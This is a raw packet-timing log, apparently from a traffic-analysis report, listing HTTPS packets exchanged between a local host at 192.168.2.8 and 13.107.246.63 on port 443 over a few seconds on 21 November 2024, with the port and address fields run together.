                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.470304966 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.471235037 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.552037001 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.570374012 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.589788914 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.590791941 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.624504089 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.673964977 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.678910971 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.780932903 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.780987024 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.800462961 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.800553083 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.807398081 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.808316946 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.808382988 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.808783054 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.812114000 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.812378883 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.813261032 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.931848049 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:03.932709932 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.017843008 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.020817995 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.149517059 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.150037050 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.150124073 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.151492119 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.151602030 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.151662111 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.156306982 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.157258987 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.158101082 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.161611080 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.276879072 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.281292915 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.359656096 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.364382982 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.491913080 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.493349075 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.493578911 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.493634939 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.494079113 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.496577024 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.496630907 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.581738949 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.581810951 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.585201025 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.622890949 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.702215910 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.705048084 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.749782085 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.824562073 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.837133884 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.837179899 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.837470055 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.839752913 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.839752913 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.912503004 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.915474892 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:04.959495068 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.035125017 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.037817955 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.048264027 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.050697088 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.170289993 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.183563948 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.183653116 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.183715105 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.186355114 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.186486959 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.300225973 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.303106070 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.305943012 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.381045103 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.381105900 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.384736061 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.393757105 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.396630049 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.465713024 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.504540920 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.516531944 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.524005890 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.524055958 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.524104118 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.527698994 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.527776003 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.647525072 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.715017080 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.719152927 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.727051973 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.727173090 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.730644941 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.734365940 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.737407923 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.850336075 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.863328934 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.863632917 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.863703966 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.869765997 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.872467995 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:05.992110968 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.061070919 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.064469099 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.072782993 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.072875977 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.072900057 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.072926044 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.075541973 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.075675011 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.195091009 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.210782051 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.210871935 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.211200953 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.234282970 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.244095087 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.366844893 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.405724049 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.408869982 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.411051035 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.411093950 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.411226988 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.411360979 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.413433075 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.413433075 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.539274931 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.577481031 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.581854105 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.616317034 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.619069099 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.749605894 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.749703884 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.752490997 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.753309011 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.753376007 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.753401041 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.753427982 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.756263971 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.756690979 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.797545910 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:06.888839960 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.011231899 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.041979074 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.086179018 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.088820934 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.099275112 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.099334955 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.101603985 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.103230953 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.103338003 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.161580086 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.167534113 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.168844938 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.221215010 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.288727999 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.376365900 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.379568100 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.431757927 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.435199022 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.497730970 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.497900009 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.501102924 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.507587910 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.507658958 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.507721901 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.507786036 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.512449026 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.514518976 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.598093987 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.620646954 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.631957054 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.634166956 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.718139887 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.724176884 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.831202984 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.834949970 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.842569113 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.843852043 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.843935966 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.846271992 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.848977089 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.849136114 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.849138975 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.853203058 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.855865955 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.856957912 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.965846062 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:07.976435900 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.058780909 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.062297106 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.226043940 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.260124922 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.260212898 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.260415077 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.262403965 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.262481928 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.262588024 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.263514042 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.267424107 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.268779993 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.269804955 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.384448051 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.388523102 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.389918089 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.390532970 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.470733881 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.527638912 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.600481987 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.606005907 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.606071949 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.606086969 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.652681112 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.681130886 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.730779886 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.767791033 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.768580914 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.770155907 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.772327900 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.775460958 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.887711048 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.889621973 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.890278101 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.892487049 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:08.895912886 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.103823900 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.112632990 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.112765074 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.112837076 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.118222952 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.118235111 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.118310928 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.230233908 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.230526924 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.231122017 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.231889963 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.232511997 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.349880934 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.349978924 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.351536989 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.351550102 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.353127003 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.567931890 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.570287943 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.570303917 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.570516109 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.573405981 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.575002909 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.575020075 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.575952053 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.578691006 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.580049992 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:09.703192949 CET4434970713.107.246.63192.168.2.8
